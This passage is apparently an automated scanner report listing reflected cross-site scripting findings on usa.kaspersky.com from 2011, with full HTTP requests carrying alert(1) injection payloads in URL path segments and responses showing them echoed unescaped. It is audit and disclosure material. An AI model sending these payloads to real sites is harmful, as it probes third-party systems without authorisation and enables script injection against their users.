s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sitesde1b1"-alert(1)-"b94c665e0b4/usa.kaspersky.com/files/css_injector_144.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.56. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72028"><script>alert(1)</script>85413005a1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites72028"><script>alert(1)</script>85413005a1f/usa.kaspersky.com/files/css_injector_144.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:32:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387573"
Content-Type: text/html; charset=utf-8
Content-Length: 37545
Date: Sun, 23 Oct 2011 16:33:25 GMT
X-Varnish: 1652555112
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites72028"><script>alert(1)</script>85413005a1f/usa.kaspersky.com/files/css_injector_144.css?3" />
...[SNIP]...

1.57. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fb10"-alert(1)-"62f5664cc26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com5fb10"-alert(1)-"62f5664cc26/files/css_injector_144.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387736"
Content-Type: text/html; charset=utf-8
Content-Length: 38721
Date: Sun, 23 Oct 2011 16:35:41 GMT
X-Varnish: 1652565130
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com5fb10"-alert(1)-"62f5664cc26/files/css_injector_144.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.58. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b936e"><script>alert(1)</script>356d95627ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.comb936e"><script>alert(1)</script>356d95627ba/files/css_injector_144.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387708"
Content-Type: text/html; charset=utf-8
Content-Length: 37522
Date: Sun, 23 Oct 2011 16:35:15 GMT
X-Varnish: 1652563130
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.comb936e"><script>alert(1)</script>356d95627ba/files/css_injector_144.css?3" />
...[SNIP]...

1.59. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1997"-alert(1)-"87704505a68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/filesd1997"-alert(1)-"87704505a68/css_injector_144.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:37 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387797"
Content-Type: text/html; charset=utf-8
Content-Length: 40324
Date: Sun, 23 Oct 2011 16:36:41 GMT
X-Varnish: 1652568202
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/filesd1997"-alert(1)-"87704505a68/css_injector_144.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.60. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cc0e"><script>alert(1)</script>038718c3d0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files1cc0e"><script>alert(1)</script>038718c3d0/css_injector_144.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:13 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387773"
Content-Type: text/html; charset=utf-8
Content-Length: 40466
Date: Sun, 23 Oct 2011 16:36:25 GMT
X-Varnish: 1652566706
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files1cc0e"><script>alert(1)</script>038718c3d0/css_injector_144.css?3" />
...[SNIP]...

1.61. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 623f4"><script>alert(1)</script>c861ee1c24e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/css_injector_144.css623f4"><script>alert(1)</script>c861ee1c24e?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:57 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387817"
Content-Type: text/html; charset=utf-8
Content-Length: 37876
Date: Sun, 23 Oct 2011 16:37:02 GMT
X-Varnish: 1652569061
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css623f4"><script>alert(1)</script>c861ee1c24e?3" />
...[SNIP]...

1.62. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac54c"-alert(1)-"de408bbf3a8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/css_injector_144.cssac54c"-alert(1)-"de408bbf3a8?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387835"
Content-Type: text/html; charset=utf-8
Content-Length: 39279
Date: Sun, 23 Oct 2011 16:37:19 GMT
X-Varnish: 1652569954
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
= s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.cssac54c"-alert(1)-"de408bbf3a8?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.63. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14f39"-alert(1)-"a6b00befd51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites14f39"-alert(1)-"a6b00befd51/usa.kaspersky.com/files/css_injector_153.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:28:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387298"
Content-Type: text/html; charset=utf-8
Content-Length: 39506
Date: Sun, 23 Oct 2011 16:28:25 GMT
X-Varnish: 1652542679
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites14f39"-alert(1)-"a6b00befd51/usa.kaspersky.com/files/css_injector_153.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.64. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20d05"><script>alert(1)</script>acfec7ce059 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites20d05"><script>alert(1)</script>acfec7ce059/usa.kaspersky.com/files/css_injector_153.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:27:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387251"
Content-Type: text/html; charset=utf-8
Content-Length: 37546
Date: Sun, 23 Oct 2011 16:27:46 GMT
X-Varnish: 1652539869
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites20d05"><script>alert(1)</script>acfec7ce059/usa.kaspersky.com/files/css_injector_153.css?3" />
...[SNIP]...

1.65. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3561"-alert(1)-"21929865d5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.comd3561"-alert(1)-"21929865d5e/files/css_injector_153.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:30:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387423"
Content-Type: text/html; charset=utf-8
Content-Length: 38721
Date: Sun, 23 Oct 2011 16:30:43 GMT
X-Varnish: 1652549102
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.comd3561"-alert(1)-"21929865d5e/files/css_injector_153.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.66. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b86a2"><script>alert(1)</script>e0a071fa1d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.comb86a2"><script>alert(1)</script>e0a071fa1d7/files/css_injector_153.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:29:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387393"
Content-Type: text/html; charset=utf-8
Content-Length: 37522
Date: Sun, 23 Oct 2011 16:29:59 GMT
X-Varnish: 1652547954
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.comb86a2"><script>alert(1)</script>e0a071fa1d7/files/css_injector_153.css?3" />
...[SNIP]...

1.67. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_153.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7ab2"><script>alert(1)</script>7f0af06d8a8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/filese7ab2"><script>alert(1)</script>7f0af06d8a8/css_injector_153.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:33:03 +0000
